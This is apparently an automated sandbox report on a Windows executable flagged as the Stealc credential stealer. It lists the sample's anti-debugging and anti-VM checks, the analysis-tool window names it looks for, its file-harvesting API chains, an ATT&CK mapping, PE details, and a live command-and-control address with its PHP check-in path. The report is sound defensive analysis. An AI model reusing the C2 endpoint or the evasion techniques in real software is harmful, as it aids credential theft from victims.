                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 562A65 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EE7EF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37758
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000E40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_000DE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000D1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000E47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000E3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000E4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_000DDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_000DEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_000DBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D1160 GetSystemInfo,ExitProcess,0_2_000D1160
                Source: file.exe, file.exe, 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1743848806.0000000000DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware6
                Source: file.exe, 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1743848806.0000000000D75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36573
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36570
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36591
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36625
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36459
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36585
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D4610 VirtualProtect ?,00000004,00000100,000000000_2_000D4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9AA0 mov eax, dword ptr fs:[00000030h]0_2_000E9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_000E7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7092, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000E9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_000E98E0
                Source: file.exe, file.exe, 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00117588 cpuid 0_2_00117588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_000E7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_000E7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000E79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_000E7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1698160628.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7092, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1698160628.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7092, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                http://185.215.113.20620%VirustotalBrowse
                http://185.215.113.206/6c4adf523b719729.php21%VirustotalBrowse
                http://185.215.113.206/20%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrueunknown
                http://185.215.113.206/trueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.php/%file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://185.215.113.206file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.206$Pfile.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.215.113.206Gfile.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php7)file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.phpGfile.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1546537
                          Start date and time:2024-11-01 05:00:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 15s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 135
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/746f34465cf17784/sqlite3.dll

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.961389881797388
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:2'137'600 bytes
                          MD5:212e008d0b8a1d4874846987f37e34fa
                          SHA1:0c125b1139dbbb0aa2fedfb916d1365001cce1e9
                          SHA256:d9d47fd94a18e02cb473ec8ed22d7d7f6ce79825f999d129d662f71409a48082
                          SHA512:f2d886ef7cedc828234029b48bb146c449ecdf7d2d293c759af6dc61f873fe873be5cbea21b9c07fd6ed868aa8b32cba804b79bd788475f53490b54872e7d0d6
                          SSDEEP:49152:uGVhpyQho3PpnAE1ktGuQXdOS98NNT/tspRkYlQ3Yr2We5Vz+:hHouyWGuQNOS98NLCMYcD+
                          TLSH:98A533AB5918B21FDCCFC378F84B56EA236D8977CCD50E760A9E971829576306833470
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0xb28000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F55E4B87C1Ah
                          haddps xmm4, dqword ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+00000000h], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], bl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          pop es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2e70000x67600c452cd91279590bceaf8cb254b9dcc60unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x2ea0000x29e0000x20000b1fa9da4b124b29ef6dc7676b30fc2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          cbbjugzk0x5880000x19f0000x19ee00c516e81a0b9a596fc44e860655191620False0.9947032003238927data7.953118561919161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          lfmofsyx0x7270000x10000x400e1efcaf2dd45435f7b059c61f63c83a1False0.8662109375data6.483364564858445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x7280000x30000x2200b5f77a543fd20da36992272eb3d755d8False0.07364430147058823DOS executable (COM)0.9636343475363153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-11-01T05:01:04.048750+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 1, 2024 05:01:02.857176065 CET4973080192.168.2.4185.215.113.206
                          Nov 1, 2024 05:01:02.862107992 CET8049730185.215.113.206192.168.2.4
                          Nov 1, 2024 05:01:02.862201929 CET4973080192.168.2.4185.215.113.206
                          Nov 1, 2024 05:01:02.872539043 CET4973080192.168.2.4185.215.113.206
                          Nov 1, 2024 05:01:02.877387047 CET8049730185.215.113.206192.168.2.4
                          Nov 1, 2024 05:01:03.761468887 CET8049730185.215.113.206192.168.2.4
                          Nov 1, 2024 05:01:03.763794899 CET4973080192.168.2.4185.215.113.206
                          Nov 1, 2024 05:01:03.763794899 CET4973080192.168.2.4185.215.113.206
